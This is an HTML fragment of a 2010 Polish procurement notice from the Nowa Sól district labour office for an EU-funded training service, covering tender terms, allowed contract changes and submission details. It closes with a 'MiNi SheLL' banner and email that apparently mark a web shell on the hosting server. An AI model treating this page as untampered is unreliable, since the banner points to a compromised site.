<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany są zawarte w §9 pkt  3, 4 i 5 załączonego do SIWZ wzoru umowy, który brzmi:
1.	W przypadkach losowych i niezależnych od Wykonawcy Zamawiający dopuszcza wprowadzenie zmian:
1)	w zakresie zmiany wykładowcy na wykładowcę o takim samym poziomie wykształcenia i doświadczenia zawodowego. Wykonawca w takiej sytuacji musi uzyskać zgodę pisemną Zamawiającego, po niezwłocznym pisemnym powiadomieniu o zaistniałej sytuacji uzasadniającej okoliczności zmiany oraz przedłożeniu stosownych dokumentów potwierdzających kwalifikacje nowego wykładowcy. Wprowadzone zmiany nie mogą spowodować zmiany liczby wykładowców.
2)	w przypadku uzasadnionej konieczności dokonania zmian lokalu lub placu manewrowego wskazanego w § 3 pkt 5 Wykonawca musi zapewnić lokal lub plac manewrowy, który będzie spełniać co najmniej warunki podane przez Wykonawcę w ofercie (ilość samodzielnych stanowisk szkoleniowych, opis stanowisk, powierzchnia lokalu lub placu manewrowego, warunki sanitarne, zaplecze socjalne, itp.). Wykonawca w takiej sytuacji musi uzyskać zgodę pisemną Zamawiającego, po niezwłocznym pisemnym powiadomieniu o zaistniałej sytuacji uzasadniającej okoliczności zmiany oraz przedłożeniu stosownych dokumentów potwierdzających spełniane warunki.
2.	W przypadku zaistnienia nie przewidzianej i uzasadnionej potrzeby zmiany Podwykonawcy (o którym mowa w § 3 pkt 6) w trakcie realizacji zamówienia, Wykonawca musi wystąpić z pismem i uzyskać pisemną zgodę Zamawiającego przed dopuszczeniem nowego Podwykonawcy do realizacji zamówienia. Wprowadzone zmiany nie mogą spowodować zmiany liczby podwykonawców oraz zmiany jakości wykonania tej części zamówienia.
3.	Zmiany o których mowa w pkt 2, 3 ppkt 2) i pkt 4 następują po podpisaniu przez obie strony aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup.nowasol.ibip.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy, ul. Staszica 1C, 67-100 Nowa Sól - pokój nr 315- III piętro za pośrednictwem poczty elektronicznej e-mail: zamowienia@pup-nowasol.pl lub zino@praca.gov.pl  oraz faksu:0683880301.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2010 godzina 09:00, miejsce: Powiatowy Urząd Pracy w Nowej Soli, ul. Staszica 1C , 67-100 Nowa Sól - pokój 107 (I piętro)- Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenie jest usługą organizowaną w ramach projektu Pomnóż swój kapitał w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VI. Rynek pracy otwarty dla wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych, współfinansowanego z Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com